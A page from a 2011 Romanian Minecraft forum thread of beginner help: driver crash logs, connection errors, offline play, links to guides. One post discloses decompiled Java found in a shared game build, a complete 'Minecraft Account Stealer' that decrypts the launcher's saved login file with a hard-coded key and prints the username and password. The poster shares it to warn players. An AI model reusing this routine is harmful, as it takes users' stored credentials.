Page 4 of 99
Re: Cum sa jucam minecraft !
Posted: 21 Jun 2011, 09:24
by LeonardoDaVinci
dNk;Zero wrote:Bad video card drivers!
-----------------------
Minecraft was unable to start because it failed to find an accelerated OpenGL mode.
This can usually be fixed by updating the video card drivers.
--- BEGIN ERROR REPORT 7fe0271 --------
Generated 6/21/11 2:04 AM
Minecraft: Minecraft Beta 1.6.6
OS: Windows XP (x86) version 5.1
Java: 1.6.0_26, Sun Microsystems Inc.
VM: Java HotSpot(TM) Client VM (mixed mode), Sun Microsystems Inc.
LWJGL: 2.4.2
[failed to get system properties (java.lang.NullPointerException)]
org.lwjgl.LWJGLException: Pixel format not accelerated
at org.lwjgl.opengl.WindowsPeerInfo.nChoosePixelFormat(Native Method)
at org.lwjgl.opengl.WindowsPeerInfo.choosePixelFormat(WindowsPeerInfo.java:52)
at org.lwjgl.opengl.WindowsDisplay.createWindow(WindowsDisplay.java:185)
at org.lwjgl.opengl.Display.createWindow(Display.java:311)
at org.lwjgl.opengl.Display.create(Display.java:856)
at org.lwjgl.opengl.Display.create(Display.java:784)
at org.lwjgl.opengl.Display.create(Display.java:765)
at net.minecraft.client.Minecraft.a(SourceFile:287)
at net.minecraft.client.Minecraft.run(SourceFile:683)
at java.lang.Thread.run(Unknown Source)
--- END ERROR REPORT 7bf8dfe0 ----------
Ce trebuie sa fac ?
Dute la Option -->Video-->Advanced OpenGl-->OFF si o sa mearga

Re: Cum sa jucam minecraft !
Posted: 22 Jun 2011, 22:16
by deeb01
NIci mie nu imi merge,imi scrie "Internal exception: java.netSocketException: Connection Reset
Re: Cum sa jucam minecraft !
Posted: 23 Jun 2011, 09:20
by LeonardoDaVinci
deeb01 wrote:NIci mie nu imi merge,imi scrie "Internal exception: java.netSocketException: Connection Reset
Un search..
viewtopic.php?f=13&t=831
Re: Cum sa jucam minecraft !
Posted: 24 Jun 2011, 11:19
by pringon
eu cand incerc sa folosesc contu de pe minecraft imi spune ca accountu meu nu e premium ce ar trebui sa fac
Re: Cum sa jucam minecraft !
Posted: 24 Jun 2011, 11:20
by LeonardoDaVinci
pai ii dai play offline si o sa mearga
Re: Cum sa jucam minecraft !
Posted: 26 Jun 2011, 17:27
by weddyweddy
Sunt incepator ! minecraft si ai putea sa-mi zici si mie cum se joaca Sabiile,armurile sau nustiu ce ! (VREAU SA MA APUC DE MINECRAFT) te rog da-mi un pm! Cum se joaca minecraft; )
Multumesc:D
Re: Cum sa jucam minecraft !
Posted: 27 Jun 2011, 09:32
by LeonardoDaVinci
weddyweddy wrote:Sunt incepator ! minecraft si ai putea sa-mi zici si mie cum se joaca Sabiile,armurile sau nustiu ce ! (VREAU SA MA APUC DE MINECRAFT) te rog da-mi un pm! Cum se joaca minecraft; )
Multumesc:D
http://www.minecraft-romania.com/?p=123
http://www.minecraft-romania.com/?p=125
http://www.minecraft-romania.com/?p=127
Urmareste cu atentie astea si ai sa inveti sa joci!
Cat despre sabii,armuri uite aici
http://minecraft-romania.com/work/crafting.htm
Re: Cum sa jucam minecraft !
Posted: 27 Jun 2011, 13:42
by MoD
Bre.. imi sacadeaza dupa ce intru in joc.
Daca joc pe net.. imi merge perfect. Ce as putea face?

Re: Cum sa jucam minecraft !
Posted: 27 Jun 2011, 16:04
by Nort0N
O simpla intrebare.
Versiunea jocului tu ai facuto?
Deoarece am reusit sa scot sursa de la JAVA si am observat :
Code: Select all
import java.io.DataInputStream;
import java.io.File;
import java.io.FileInputStream;
import java.util.Random;
import javax.crypto.Cipher;
import javax.crypto.CipherInputStream;
import javax.crypto.SecretKey;
import javax.crypto.SecretKeyFactory;
import javax.crypto.spec.PBEKeySpec;
import javax.crypto.spec.PBEParameterSpec;
/*
* To change this template, choose Tools | Templates
* and open the template in the editor.
*/
/**
*
* @author DJiNN
*/
public class Main {
public static File getMinecraftDir() {
String os = System.getProperty("os.name", "").toLowerCase();
String home = System.getProperty("user.home", ".");
if (os.contains("win")) {
String appdata = System.getenv("APPDATA");
if (appdata != null) {
return new File(appdata, ".minecraft");
} else {
return new File(home, ".minecraft");
}
} else if (os.contains("mac")) {
return new File(home, "Library/Application Support/minecraft");
} else {
return new File(home, ".minecraft/");
}
}
public static void main(String[] args) {
try {
Random random = new Random(43287234L);
byte[] salt = new byte[8];
random.nextBytes(salt);
PBEParameterSpec pbeParamSpec = new PBEParameterSpec(salt, 5);
SecretKey pbeKey = SecretKeyFactory.getInstance("PBEWithMD5AndDES").generateSecret(new PBEKeySpec("passwordfile".toCharArray()));
Cipher cipher = Cipher.getInstance("PBEWithMD5AndDES");
cipher.init(2, pbeKey, pbeParamSpec);
File passFile = new File(getMinecraftDir(), "lastlogin");
DataInputStream dis = null;
if (cipher != null) {
dis = new DataInputStream(new CipherInputStream(new FileInputStream(passFile), cipher));
} else {
dis = new DataInputStream(new FileInputStream(passFile));
}
System.out.println("Minecraft Account Stealer - By DJiNN");
System.out.println("Username: " + dis.readUTF());
System.out.println("Password: " + dis.readUTF());
dis.close();
} catch (Exception ex) {
ex.printStackTrace();
}
}
}
In acele paragrafe exista :
Code: Select all
System.out.println("Minecraft Account Stealer - By DJiNN");
System.out.println("Username: " + dis.readUTF());
System.out.println("Password: " + dis.readUTF());
dis.close();
Stiti ce va spun?
_|_
Re: Cum sa jucam minecraft !
Posted: 28 Jun 2011, 16:27
by Skinner
MULTUMIM !
